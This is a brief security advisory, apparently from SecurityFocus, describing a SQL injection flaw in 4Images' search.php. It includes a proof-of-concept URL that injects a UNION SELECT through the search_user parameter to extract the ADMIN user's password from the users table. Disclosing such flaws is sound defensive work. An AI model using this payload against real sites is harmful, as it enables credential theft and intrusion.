4Images Search.PHP SQL Injection Vulnerability

Attackers can exploit these issues via a web client.

The following proof of concept is available:

http://www.example.com/<target>/<4images_dir>/search.php?search_user=x%2527%20union%20select%20user_password%20from%204images_users%20where%20user_name=%2527ADMIN


 

Privacy Statement
Copyright 2010, SecurityFocus